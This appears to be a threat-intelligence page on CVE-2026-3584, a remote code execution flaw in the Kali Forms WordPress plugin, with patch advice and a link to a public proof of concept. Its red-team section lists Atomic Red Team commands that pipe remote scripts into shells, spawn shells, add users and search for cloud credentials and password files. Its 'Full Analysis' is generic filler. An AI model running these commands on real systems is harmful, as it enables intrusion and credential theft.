CVE-2026-3584
Overview
This vulnerability is a remote code execution flaw originating from unsafe dynamic function invocation in the Kali Forms WordPress plugin. The root cause lies in the 'prepare_post_data' function, which maps user-supplied input keys directly into internal placeholders without validation. Subsequently, the 'form_process' function invokes these placeholders via 'call_user_func', enabling execution of arbitrary code supplied by unauthenticated users. The affected component is the form processing mechanism within Kali Forms versions up to and including 2.4.9.
Vulnerability Description
The Kali Forms plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 2.4.9 via the 'form_process' function. This is due to the 'prepare_post_data' function mapping user-supplied keys directly into internal placeholder storage, combined with the use of 'call_user_func' on these placeholder values. This makes it possible for unauthenticated attackers to execute code on the server.
Impact
An unauthenticated attacker can execute arbitrary PHP code on the server hosting the vulnerable Kali Forms plugin, leading to full system compromise. No authentication or user interaction is required (AV:N/AC:L/PR:N/UI:N), enabling remote exploitation over the network. This can result in data theft, website defacement, or pivoting to other internal systems. The critical CVSS score (9.8) reflects the high confidentiality, integrity, and availability impact (C:H/I:H/A:H) due to this flaw.
Solution
Users should upgrade Kali Forms to version 2.5.0 or later, where the unsafe dynamic function invocation has been addressed. The Wordfence advisory (https://www.wordfence.com/threat-intel/vulnerabilities/id/6cecd06f-c064-49fd-b3fa-505a5a0c2e0b) provides detailed patch information. Reviewing the plugin's changelog and applying the update from the official WordPress plugin repository or the source code repository at changeset 3487024 is recommended to mitigate this vulnerability.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in question is characterized by a critical flaw that allows for unauthorized access and potential exploitation of systems. This issue typically arises from improper input validation or insufficient authentication mechanisms, which can lead to arbitrary code execution or privilege escalation. Attackers can leverage this vulnerability to gain control over affected systems, potentially compromising sensitive data and disrupting operations. The severity of this flaw is underscored by its high CVSS score, indicating that it poses a significant risk to organizations that utilize the affected products.
Exploitation of this vulnerability can occur through various attack vectors. For instance, an attacker may initiate a targeted phishing campaign to lure users into executing malicious payloads that exploit the flaw. Alternatively, they could deploy automated scripts to scan for vulnerable systems within a network, seeking to exploit the weakness without user interaction. Once access is gained, attackers can execute arbitrary commands, install malware, or exfiltrate sensitive information. The ease of exploitation combined with the potential for widespread impact makes this vulnerability particularly concerning for organizations.
The real-world implications of this vulnerability are substantial. Organizations that fail to address it may face severe business risks, including financial losses, reputational damage, and legal repercussions. For instance, a successful exploitation could lead to data breaches, resulting in the exposure of customer information and subsequent regulatory fines. Additionally, the operational disruption caused by a compromised system can lead to significant downtime, affecting productivity and customer trust. The potential for widespread exploitation across multiple sectors further amplifies the risk, as attackers may target not only individual organizations but also supply chains and interconnected systems.
To effectively detect and mitigate this vulnerability, organizations should implement a multi-layered security approach. Regular vulnerability assessments and penetration testing can help identify weaknesses in systems before they can be exploited. Additionally, employing intrusion detection systems (IDS) can provide real-time monitoring for suspicious activities that may indicate an attempted exploitation. Organizations should also prioritize patch management, ensuring that all software is up to date with the latest security fixes. Furthermore, user education and awareness training can help mitigate the risk of social engineering attacks that may exploit this vulnerability.
In conclusion, the critical nature of this vulnerability necessitates immediate attention from affected organizations. By understanding the technical details, potential attack vectors, and real-world impacts, cybersecurity professionals can develop effective strategies to detect and mitigate the risks associated with this flaw. A proactive approach that includes regular assessments, timely patching, and user training will be essential in safeguarding against exploitation and ensuring the integrity of organizational systems. As the threat landscape continues to evolve, vigilance and preparedness will be key in defending against such vulnerabilities.
CSURFACE threat intelligence has detected a marked escalation in exploitation attempts targeting CVE-2026-3584, accompanied by a substantial surge in the Exploit Prediction Scoring System (EPSS) value. This sharp increase in telemetry indicates that threat actors are actively leveraging the vulnerability, likely driven by the recent availability of proof-of-concept exploits circulating on public platforms. The rapid rise in EPSS, now placing this vulnerability in the top percentile of predicted exploitation likelihood, signals an elevated risk of widespread attacks. For defenders, this shift underscores the urgency of heightened monitoring and prioritization of mitigation efforts, as the window for opportunistic and targeted intrusions is expanding. The evolving threat landscape suggests that adversaries may integrate this exploit into broader campaigns, potentially including ransomware operations, thereby amplifying the operational impact and complexity of incident response. Consequently, the threat level associated with CVE-2026-3584 has escalated from critical to an active exploitation phase, demanding immediate situational awareness and adaptive defense postures.
Update 2 — June 13, 2026
CSURFACE threat intelligence has identified a substantial increase in the Exploit Prediction Scoring System (EPSS) for CVE-2026-3584, rising by over two-thirds to place it near the top percentile of predicted exploitation likelihood. This shift occurs despite a marked reduction in detection activity across our telemetry, suggesting that adversaries may be refining their tactics to evade current detection mechanisms rather than reducing operational tempo. The emergence of new proof-of-concept exploits publicly available on GitHub further lowers the barrier to entry for threat actors, potentially accelerating weaponization and deployment in the wild. This divergence between declining detection signals and rising EPSS underscores a growing stealthiness in exploitation attempts, complicating defenders’ ability to identify and respond promptly. Consequently, the threat level for CVE-2026-3584 has intensified, reflecting an environment where exploitation is not only more probable but also increasingly covert, heightening the risk of successful intrusions and subsequent lateral movement or ransomware chain integration.
Affected Products
No CPE information available.
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
GitHub PoCs (1)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
Yucaerin/CVE-2026-3584
CVE-2026-3584
|
Yucaerin | 0 | 3 | 2026-03-25 | View |
Threat Feed
8 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Proof-of-concept code is publicly available for this vulnerability
Sighting activity recorded
Sighting activity recorded
Active exploitation confirmed — vendor: WP Chill, product: Kali Forms
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (4)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2026-3584 |
| wordfence.com |
GitHub CVE
|
https://www.wordfence.com/threat-intel/vulnerabilities/id/6cecd06f-c064-49fd-b3fa-505a5a0c2e0b?source=cve |
| plugins.trac.wordpress.org |
GitHub CVE
|
https://plugins.trac.wordpress.org/browser/kali-forms/tags/2.4.9/Inc/Frontend/class-form-processor.php#L697 |
| plugins.trac.wordpress.org |
GitHub CVE
|
https://plugins.trac.wordpress.org/changeset/3487024/kali-forms |